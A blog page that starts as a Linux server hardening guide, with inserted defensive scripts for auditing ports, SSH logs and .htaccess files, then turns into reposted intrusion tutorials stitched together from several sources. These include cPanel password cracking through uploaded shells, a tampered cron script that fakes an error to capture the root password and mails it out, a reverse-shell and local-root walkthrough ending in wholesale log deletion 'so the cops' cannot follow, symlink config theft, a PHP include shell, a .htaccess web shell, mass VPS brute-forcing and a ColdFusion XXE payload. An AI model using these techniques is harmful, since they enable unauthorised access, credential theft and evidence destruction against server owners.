
Sunday, 9 February 2014

How to Secure a Linux Server



The free, open-source GNU/Linux operating system is getting better each year for desktop use, but it's been a major contender for server use since the late 1990s. With popularity, however, it has become profitable for thieves to break into Linux servers and use them for spamming, scams, and serving pornography, among other things. Here are some ways you can protect your server from such a fate.

Steps

  1. Learn to use Linux from the shell (command line). Every layer of software added on to make your system administration "easier" actually adds more methods for crackers to gain access to your machine and also reduces performance. All the further steps will assume your familiarity with using a shell.


  • Using lsof or a similar tool, find out on which ports your computer is listening for connections:

    ns003:~# lsof -i
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    named 17829 root 4u IPv6 12689530 UDP *:34327
    named 17829 root 6u IPv4 12689531 UDP *:34329
    named 17829 root 20u IPv4 12689526 UDP ns003.unternet.net:domain
    named 17829 root 21u IPv4 12689527 TCP ns003.unternet.net:domain (LISTEN)
    named 17829 root 22u IPv4 12689528 UDP 209.40.205.146:domain
    named 17829 root 23u IPv4 12689529 TCP 209.40.205.146:domain (LISTEN)
    lighttpd 17841 www-data 4u IPv4 12689564 TCP *:www (LISTEN)
    sshd 17860 root 3u IPv6 12689580 TCP *:ssh (LISTEN)
    sshd 17880 root 3u IPv6 12689629 TCP *:8899 (LISTEN)
    sshd 30435 root 4u IPv6 74368139 TCP 209.40.205.146:8899->dsl-189-130-12-20.prod-infinitum.com.mx:3262 (ESTABLISHED)

  • If in doubt, hack it out! Shut down any unknown or unneeded services, using the appropriate tools for your Linux distribution, such as update-rc.d on Debian systems, or in some cases editing the /etc/inetd.conf or /etc/xinetd.d/* files. Along with this, get rid of any tools your server provider added for system administration, such as Plesk.

  • Don't allow root logins on your primary sshd port 22 (set PermitRootLogin to "no"); many automated tools run brute-force attacks on that. Set up a secondary port for root access that only works by shared keys, disallowing passwords:
    • Copy the sshd_config file to root_sshd_config, and change the following items in the new file:
      • Port: change from 22 to some other number, say 8899 (don't use this! make up your own!)
      • PermitRootLogin: change from "no" (you were supposed to set it to "no" for port 22, remember?) to "yes"
      • AllowUsers root: add this line, or if it exists, change it to allow only root logins on this port
      • ChallengeResponseAuthentication no: uncomment this line if it's commented out, and make sure it says "no" instead of "yes"
    • Test this command: 

      sshd -D -f /etc/ssh/root_sshd_config
      and see if it works correctly -- try logging in from another computer (you must have already set up shared-key authentication between the two computers) using: 

      ssh -p8899 root@my.remote.server
      and if so, control-C at the above (sshd) command to stop the sshd daemon, then add this to the end of /etc/inittab: 

      rssh:2345:respawn:sshd -D -f /etc/ssh/root_sshd_config
    • Restart the init task: # init q This will run your "root ssh daemon" as a background task, automatically restarting it in case of failure.
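The port audit in the steps above is easy to do by eye on a small host, but on a busy server the listing runs to hundreds of lines. The following script is an added example (not from the original article): it parses the text that lsof -i prints, keeps only bound UDP sockets and TCP sockets in LISTEN state, drops established connections, and reports anything that is not on an explicit allow-list. The sample output and the EXPECTED allow-list are constructed from the article's listing and are assumptions for this host.

```python
"""Audit `lsof -i` output for listening sockets that are not on an allow-list.

Added example, not part of the original article. The sample listing below is
constructed from the article's own lsof output; the EXPECTED set is a
hypothetical allow-list an operator would maintain for this host.
"""
from dataclasses import dataclass

# Constructed sample, trimmed from the article's listing.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
named 17829 root 4u IPv6 12689530 UDP *:34327
named 17829 root 20u IPv4 12689526 UDP ns003.unternet.net:domain
named 17829 root 21u IPv4 12689527 TCP ns003.unternet.net:domain (LISTEN)
lighttpd 17841 www-data 4u IPv4 12689564 TCP *:www (LISTEN)
sshd 17860 root 3u IPv6 12689580 TCP *:ssh (LISTEN)
sshd 17880 root 3u IPv6 12689629 TCP *:8899 (LISTEN)
sshd 30435 root 4u IPv6 74368139 TCP 209.40.205.146:8899->dsl-189-130-12-20.prod-infinitum.com.mx:3262 (ESTABLISHED)
"""

# Hypothetical allow-list for this host: (command, protocol, port-or-service).
EXPECTED = {
    ("named", "UDP", "domain"),
    ("named", "TCP", "domain"),
    ("lighttpd", "TCP", "www"),
    ("sshd", "TCP", "ssh"),
    ("sshd", "TCP", "8899"),  # the secondary root-only sshd from the article
}


@dataclass(frozen=True)
class Listener:
    command: str
    pid: int
    user: str
    proto: str  # "TCP" or "UDP"
    addr: str   # bind address as lsof prints it; "*" means every interface
    port: str   # numeric port, or a service name when lsof resolves it


def parse_listeners(text):
    """Return the listening TCP sockets and bound UDP sockets in lsof -i output."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # The SIZE/OFF column is blank for sockets on many systems, so locate the
        # protocol column by value instead of by position.
        idx = next((i for i, f in enumerate(fields) if f in ("TCP", "UDP")), None)
        if idx is None or idx + 1 >= len(fields):
            continue  # header row or a line without a socket
        proto, name = fields[idx], fields[idx + 1]
        state = fields[idx + 2] if len(fields) > idx + 2 else ""
        if "->" in name:                        # a connection to a peer, not a listener
            continue
        if proto == "TCP" and state != "(LISTEN)":
            continue
        addr, _, port = name.rpartition(":")
        listeners.append(Listener(fields[0], int(fields[1]), fields[2], proto, addr, port))
    return listeners


def unexpected_listeners(listeners, expected=EXPECTED):
    """Listeners whose (command, proto, port) is not on the allow-list."""
    return [l for l in listeners if (l.command, l.proto, l.port) not in expected]


if __name__ == "__main__":
    found = parse_listeners(SAMPLE_LSOF)
    for item in unexpected_listeners(found):
        print(f"REVIEW: {item.command}[{item.pid}] as {item.user} "
              f"{item.proto} {item.addr}:{item.port}")
```

On the article's listing the only item flagged is named's UDP socket on port 34327, bound on every interface. That is the kind of entry worth a second look: it has to be explained (here, a resolver's query port) and either added to the allow-list deliberately or shut down, rather than waved through because the process name is familiar.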

  Tips

    • Check your log files regularly to see what types of attacks are being run against your server. /var/log/auth or /var/log/auth.log is a typical place to find attempted logins: 
      Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
      Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
      Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
      Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
      Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
    • Regularly upgrade your operating system to add security fixes. On Debian: apt-get upgrade
    • Monitor news on vulnerabilities at http://www.securityfocus.com/ and related websites.
    • Try installing grsecurity and/or SELinux and/or AppArmor and/or PaX.
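Reading auth.log by hand works until the file grows to thousands of lines a day. The script below is an added example (not from the original article) of the check the tip describes done programmatically: it parses the "Illegal user" lines shown above (newer OpenSSH logs "Invalid user"; both forms are handled), strips the ::ffff: prefix that IPv4 clients get on an IPv6 socket, and flags any source address with a given number of failures inside a sliding time window. The sample log, the year and the thresholds are constructed assumptions.

```python
"""Detect SSH username-guessing from auth.log lines.

Added example, not part of the original article. Syslog timestamps carry no
year, so the caller supplies one (assumption). The sample log is the
article's five lines plus two constructed entries.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_AUTH_LOG = """\
Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
Jan 18 10:48:52 ns003 sshd[23839]: Invalid user admin from 198.51.100.7
Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
Jan 18 10:49:30 ns003 sshd[23850]: Accepted publickey for root from 198.51.100.7 port 40022 ssh2
"""

# Old OpenSSH wrote "Illegal user", newer releases write "Invalid user".
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?:Illegal|Invalid) user (?P<user>\S+) from (?P<ip>\S+)"
)


def parse_failed_logins(text, year=2014):
    """Return (timestamp, source_ip, username) for each failed-login line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if ip.startswith("::ffff:"):  # IPv4 client seen through an IPv6 socket
            ip = ip[len("::ffff:"):]
        events.append((ts, ip, m["user"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Map each source IP that reached `threshold` failures within any
    `window_seconds` window to the sorted set of usernames it tried."""
    by_ip = defaultdict(list)
    for ts, ip, user in sorted(events):
        by_ip[ip].append((ts, user))
    offenders = {}
    for ip, attempts in by_ip.items():
        window = deque()  # timestamps inside the current sliding window
        for ts, user in attempts:
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold:
                offenders[ip] = sorted({u for _, u in attempts})
                break
    return offenders


if __name__ == "__main__":
    for ip, users in detect_bruteforce(parse_failed_logins(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {len(users)} usernames tried, e.g. {', '.join(users[:3])}")
```

The sliding window matters: a single failure per hour is a typo, five in eleven seconds is a dictionary run. The same output is what you would feed to a blocking tool or to the allow-list review of who may reach the root-only port at all.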


    Cpanel Cracking

    Things Required :-
    • Shelled site ( Download Best Shellz Here)
    • Cpanel Password Cracker (Download  Password : www.rotinextools.blogspot.com)

    Step By Step Tutorial :-
    • First open you shell & upload the cpanel password cracker shell 
    • Then go down & click on User .

    • Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

    Tip: Password list should be short & effective . 
    • When the cracking is finished, you will see the result . 
    • After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel


    Root server without local root exploit




    Many hackers find it difficult to find a local root exploit for rooting the server. So here are a few methods you could try to gain root access without using a local root exploit!

    1. Custom Cron Tab Scripts

    Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.
    First, check out if there are any Cron Job Tasks:
     crontab -l 
    If you see any Custom Script, we must Check out if we can Write on it.
    Let’s say we got a Custom script here: /bin/cronscript
    To check if we can Write a File, type:
     stat /bin/cronscript 
     (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) 
    Let’s edit the file and send a Fake Error Message.
    Make a Copy of the Original Script to /bin/cronscript.bak :
     cp /bin/cronscript /bin/cronscript.bak 
    Edit the /bin/cronscript like this:
     #!/bin/sh 
     echo “An System Error Occured!” 
     echo “” 
     echo “Error Code: #131425″ 
     echo “” 
     echo “Update to get the Latest Patch for this Security Issue.” 
     read -s -p “[sudo] password for root ” rootpasswd 
     echo “” 
     echo “su: Authentication failure” 
     echo “” 
     sudo apt-get update && sudo apt-get upgrade 
     sudo echo “The Password is: $rootpasswd” > .kod 
     mail -s “Root’s Password” “  email@address.com  ” < .kod 
     rm .kod 
     mv  cronscript.bak cronscript 
    You should just Replace the Underlined with your E-Mail and the Name of the Script!
    After you save the File, type: chmod +x cronscript   to set it as Executable!
    This script will:
    - Send a Fake Error Message
    - Request for the Root’s Password
    - Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin )
    - Restore the Original File

    When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
    It would be better if you had some knowledge on Bash Programming…

    2. Enumerating all SUID Files

    An SUID File is any file that any User group has the Privileges to Access, Read and Write on it.
    What does this mean for you: You can Escalate Privileges in this way, if it is in an Important Directory.
    You can Social-Engineer a Privileged User.
    To find all SUID Files, type:
     find / -user root -perm -4000 -print 
    This will show all the SUID Files in your Terminal. Take your time and check them as they can help you to escalate Privileges!

    3. Brute Forcing

    I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch
    What is so special in this?
    The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)
    For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1
    Usage:
    ./rootdabitch.sh youremail@site.com
    For kiddies:
    First download rootdabitch to the server:
    wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
    Extract it by the following cmd:
    unzip rootdabitch-0.1.zip
    Chmod it to 755:
    chmod + x rootdabitch.sh
    Finally run the script
    ./rootdabitch.sh youremail@site.com
    Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail
    Thats all have a gr8 day :)


    LINUX SERVER ROOTING Tutorial


    Root is the administrator of the whole server. If someone gets root access he can do anything with the server, like delete and copy anything on the server, or deface all the home pages (mass deface).

    Although there are mainly 3 ways in which you can get into the server, here we will take the first method, that is by local root.

    NEEDS :
    • Netcat (Download from Here)
    • Shelled site (Best Shellz Here)
    • Local root exploit (which you can find it Here  Or Download This collection Here)
    STEPS:

    • In RUN program type cmd then type this  cd C:\Program Files\Netcat  but first save your netcat in the directory 
    After it type this  : nc -n -l -v -p 443 , and you will get this -


    Now open the url in which you had upload your shell and then connect it using back connect option in the shell(Be careful some shell do not have this option and do not use any proxy,tor or VPN), when connection is established you will get something like this -



    Now you  have successfully connected ..  then we have to get the local root exploit like now we have   2.6.18-374 2011 . 


    • Now we have to first  upload our exploit in a writable folder, simply we can just change the directory to the /tmp folder which is a standard writable folder . 
     command to change dir to /tmp : cd /tmp
    • To upload your your exploit we will use the  wget function . 
    Now Type : wget http://www.example.com/exploit.c 

    Now exploit will be uploaded to tmp folder

     

    • (CASE TYPE 1) If you have uploaded your exploit as (exploit.c) then we have to compile it, so to compile it we will type the following command.
    Type : gcc exploit.c -o exploit

    Note that  above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

    (CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

    Type: unzip exploit.zip 

    • After we have done all the above steps correctly, its time to give permission so we will type the following  command 
    Type: chmod 777 exploit
    • Now  its time to run the Exploit, to run the exploit we will type the following command 
    Type: ./exploit

    Now the exploit will run & the server will be rooted ;) . To check whether we got root we can type 

    Type: id or whoami  

    NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER

    If you do not want to get caught by the cops then delete the logs using the following commands

    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    history -c
    find / -name *.bash_history -exec rm -rf {} \;
    find / -name *.bash_logout -exec rm -rf {} \;
    find / -name "log*" -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;

    I hope you have learned how to root a server. My next tutorial will be about how to mass deface after rooting a server.
    See more at: http://www.hax0rtools.com/2013/09/linux-server-rooting-tutorial.html

    Symlink Tutorial for beginners

    What do you mean by Symbolic links?

    In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

    How to Do Symlink on Web-server ? 

    For symlinking you need shell access (GNY, C99, r57, etc.) on the website. It looks like this:


    Now You need To create 1 directory with any Name like sym,test etc....

    Now after Creating Directory You need 2 file
    1. Blank .txt file in zip format.
    2. .htaccess

    The txt file include this "/" and save it..
    and .htaccess file include this below code:

    Options Indexes FollowSymLinks
    DirectoryIndex test.htm 
    AddType txt .php
    AddHandler txt .php

    and save it like ".htaccess"

    now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip"
    file using this command:

    "unzip "file name" "

    After unzipping you will see a txt file there. Now you need to open the appropriate path in a web browser.

    It's look like this.
    Now just click on the 1.txt file that you unzipped from the zip file. After clicking on 1.txt it lists all directories of the web server; check out the image below:


    Ok done Now in Symlink we will check the Directory path like

    1. /home/"Website Username"/Public_html/
    2. /hsphere/local/home/c283273/

    There are Different Path Just you need to check out it.

    If you click on "Home" you will get a 403 error, meaning Forbidden, but never mind; after you get this error you need to add the "Website Username"

    To find WebUsers You need to execute This command

    cat /etc/passwd

    the path is "/Home/"website username"/public_html/"

    After executing the cat command it looks like the image above.

    Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE

    How did you find this specific Target site?

    you need Server Ip and www.bing.com


    To find Joomla,Wordpress and php site we can use this dork for it.
    1. ip: 123.x.x.x index.php?option=
    2. ip: 123.x.x.x "Powered By WordPress"
    3. ip: 123.x.x.x .php?id=
    and more......

    Finding Target site now you need to find config file. in joomla the config file name is "configuration.php" in wordpress "wp-config.php" etc.

    You cannot directly see the file using like this

    www.Target.com/wp-config.php
    www.Target.com/configuration.php

    But when we do a symlink on a specific target we can view the config file using right click and view source.

    It looks like the image above.

    This config file include site Database information like Database Name, Username, Password etc..

    after getting this You can login into site data base and you can edit,delete of specific columns, fields etc..

    But we need to change admin password. In many case The password is in MD5, base64 etc.. encrypted form. You need to Decrypt it... that's it.

    after changing the password You know what to do...!!!
     

    Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error

    Nowadays most Linux kernel servers show this error when you try to symlink the server. Most of the servers which show 403 Forbidden also show a "can't read named.conf" error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or whatever script is used for automated symlinking.

    This can be bypassed by reading /etc/passwd, and Symlink_Sa 3.0 can be used to bypass this.

    I will be posting the download link of some shells i will be using in this tutorial 

    Best Script which can bypass cant read /ect/named.conf are :

    1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
    2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )
    3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
    4. Symlink_Sa 3.0 Automated Symlink Script .

    Usage: Config Fucker, Config Killer and the Symlink Pain [~] Perl script: just upload them on to the server, making sure that you create a new directory. Upload the script and use the command cat /etc/passwd to read all of /etc/passwd from the server, copy it, then open your script, paste it there, click on Get Config and you're done. Just open the link of the folder you created, e.g. site.com/sen/allsoft.pl; you need to open site.com/sen/ and all config files will be there.

    Note : Its better to create a php.ini file before you do this for 100 % Result 

    All 4 shells i have mentioned i will post the download link 

    And I will be using another private shell for this which I won't be giving you all, for priv8 reasons: it's Mannu Shell, coded by Team Indishell, which can bypass the "can't read /etc/named.conf" error easily. But a 403 Forbidden server can't be bypassed using this shell.

    So now if we can't symlink to the Public_html/ of the website we can use the Symlink_sa 3.0 script's Symlink Bypass option.

    So now that we can easily Symlink to /Public_html/ path of each website 

    Now some servers show a 403 Forbidden error when you try to symlink them, so now let's see how to bypass this.



    For 403 Forbidden Error i will be Using the Following Shells :

    1. Dhanush Shell Coded By Arjun. (This shell automatically creates .htaccess, php.ini and ini.php files after you login)
    2. Mannu Shell by Team Indishell Private ! .
    3. Symlink_sa 3.0 Script

    I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )

    So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :

    .htaccess

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>


    php.ini

    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>


    1.) 403 Forbidden Error.
    2.) Open Dhanush Shell, which automatically creates .htaccess, php.ini and ini.php.
    3.) Mannu shell to check if we bypassed the 403 error.
    4.) Bypassed 403 Forbidden and access to the Public_html/ path.
    Bypassed "can't read /etc/named.conf" and 403 Forbidden errors.

    Here Download Link of all shell and script i used :  CLICK HERE
     

    How to hack a websites using Symlink Bypassing?


    Symlink Bypassing:
    Symlink is a method to reference other files and folders on Linux, in order to make Linux work faster. Symlink bypassing is a hacking technique used to gain unauthorized access to folders on a server. Using this technique hackers are able to hack multiple sites on a shared web hosting service.

    Here is Video tutorial that explain how to hack a website using Symlink Bypassing
    Video demo is created by SilentHacker 



    How To Hack Windows Servers Using Dubrute 2.2

    Today I'm sharing how to hack many Windows VPS.

    All you need are 2 pieces of software called DuBrute and Vnc_scanner to hack VPS.
    Download Links :
    Vnc_scanner : Here
    Dubrute : Here

    Words list
    How to Use ?

    1) Download both the files from the above link.
    2) Extract both the files anywhere in ur pc.
    3) Open Vnc_scanner folder
    4) Open the exe file called vnc_scanner_gui.exe



    5) Select any Country.
    6) Click on Get Dial List
    After the whole IP list has come in:
    7) Click on Start Scan


    After that it will scan for VPS working ips.


    After the scan has finished click on Start parser. It will save the good IPs in a new text file called IPs.txt.

    Now you need to get the usernames and passwords for the scanned IPs. For that you have to use a hacking tool called Dubrute.

    1) Open Dubrute folder
    2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder
    3) Open the DUBrute.exe


    4) Click on Generation
    5) Check the image below.


    1st: click on File ip, then select the text file called IPs.txt and Open.
    2nd: select File Login then Open, and then File Pass and Open.
    3rd: click on Make and press Ok.
    Then click on Exit.

    Now press Start in your Dubrute.

    Let it brute-force the combinations. When a working VPS is found whose IP, username and password match, it will be saved in the Dubrute folder in a file called goog.txt.
    Like this:
    The image shows that I found 3 VPS which are working.

    Note: Both files have a virus. Your anti-virus detects them as a Trojan etc., so when you download them, if your anti-virus is active it will delete the files. If you want to use them you have to turn off your anti-virus, or you can hack VPS from a VPS like me: I downloaded these files on a VPS and hacked from it ;P. I used this software to hack VPS over the last 1-2 weeks and hacked around 100 working VPS.

    This is a detailed tutorial about how to hack VPS. Should you have more doubts on this, feel free to reply here; I am here to help you.

    Thanks and good luck to all for hacking many VPS.

    How to use VPS

    Go to Start > Run, type mstsc and press OK.
    Then put in your VPS IP and connect. Then type your ID and password, then OK.
    That's it. You are into the Virtual Private Server.

    How to change the password of a VPS?
    Press Ctrl + Alt + End and you will see the option to change the password.
    Note: You can only change the password if you have permission from the Administrator.
    Respect!



    ATTACKING WEBSERVERS VIA .HTACCESS


    A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I couldn't help asking, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shell, but other options can easily be added (jsp, mod_perl, etc).


    This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occurs before the .htaccess file is processed as a web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags is presented as is.

    # Self contained .htaccess web shell - Part of the htshell project
    # Written by Wireghoul - http://www.justanotherhacker.com

    # Override default deny rule to make .htaccess file accessible over web
    <Files ~ "^\.ht">
    Order allow,deny
    Allow from all
    </Files>

    # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
    # the apache directives from the .htaccess file
    AddType application/x-httpd-php .htaccess

    ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######



    Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files is accessible from my github htshells repository.
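Both .htaccess tricks on this page leave a recognisable fingerprint in the file itself: the symlink tutorial's .htaccess turns on FollowSymLinks and directory indexes and remaps .php to a plain-text handler so source is served, and the self-contained shell above overrides the `<Files ~ "^\.ht">` deny rule, maps .htaccess to the PHP handler and carries script code in a comment. The scanner below is an added example, not code from either post or from the htshell project: it walks a document root and reports those directives per file. The rule names and the two sample files are constructed for this example; handler names vary between hosts, so the rules are a starting point to tune, not a complete policy.

```python
"""Flag risky directives in .htaccess files under a web root.

Added example, not from the original posts. Sample files are constructed;
the payload position in the shell-style sample holds a placeholder only.
"""
import os
import re
import tempfile

# (finding name, regex tried against each line of the file)
RULES = [
    ("exposes_htaccess_over_web",
     re.compile(r'<Files(?:Match)?\s+(?:~\s+)?"\^\\\.ht', re.I)),
    ("htaccess_mapped_to_script_handler",
     re.compile(r'^\s*(?:AddType|AddHandler|SetHandler)\b.*\.ht(?:access)?\b', re.I)),
    ("php_remapped_to_non_php_handler",  # e.g. AddType txt .php -> source disclosure
     re.compile(r'^\s*(?:AddType|AddHandler)\s+(?!application/x-httpd-php)\S+\s+.*\.php\b', re.I)),
    ("symlink_following_enabled",
     re.compile(r'^\s*Options\b.*\bFollowSymLinks\b', re.I)),
    ("directory_listing_enabled",
     re.compile(r'^\s*Options\b.*\bIndexes\b', re.I)),
    ("mod_security_disabled",
     re.compile(r'^\s*SecFilterEngine\s+Off\b', re.I)),
    ("embedded_script_code",  # PHP open tag or SSI directive inside the config file
     re.compile(r'<\?(?:php)?|<!--#', re.I)),
]

# Constructed sample in the style of the self-contained shell (payload replaced).
SHELL_STYLE = """\
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php echo "placeholder instead of a payload"; ?>
"""

# Constructed sample in the style of the symlink tutorial's .htaccess.
SYMLINK_STYLE = """\
Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php
"""


def scan_htaccess_text(text):
    """Return [(line_number, finding_name)] for every rule that matches a line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((lineno, name))
    return findings


def scan_tree(root):
    """Map each .htaccess path under `root` that has findings to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = scan_htaccess_text(fh.read())
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    # Build a throwaway document root holding both samples and scan it.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        for sub, body in (("", SYMLINK_STYLE), ("uploads", SHELL_STYLE)):
            with open(os.path.join(root, sub, ".htaccess"), "w") as fh:
                fh.write(body)
        for path, findings in scan_tree(root).items():
            print(path)
            for lineno, name in findings:
                print(f"  line {lineno}: {name}")
```

The companion mitigation is not to let .htaccess carry these directives at all: with AllowOverride restricted in the main server config, an uploaded .htaccess cannot change handlers, Options or access rules, and the scanner becomes a check that the restriction is actually in force rather than the only line of defence.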
     

    Hacking Cold Fusion Servers - Part II

    Now I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with a small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming you're all set, let's begin....

    Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't do proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically point and shoot with MSF and hope for the best. If the uploader is present it will try to send a multi-part upload request via POST. If successful you should be able to find a shell in the '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part.....




    OK, so in addition to the previously shown LFD/LFI to RCE vulnerability we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:

    /flex2gateway/
    /flex2gateway/http
    /flex2gateway/httpsecure
    /flex2gateway/cfamfpolling
    /flex2gateway/amf
    /flex2gateway/amfpolling
    /messagebroker/http
    /messagebroker/httpsecure
    /blazeds/messagebroker/http
    /blazeds/messagebroker/httpsecure
    /samples/messagebroker/http
    /samples/messagebroker/httpsecure
    /lcds/messagebroker/http
    /lcds/messagebroker/httpsecure
    /lcds-samples/messagebroker/http
    /lcds-samples/messagebroker/httpsecure

    You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service:

    "<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"

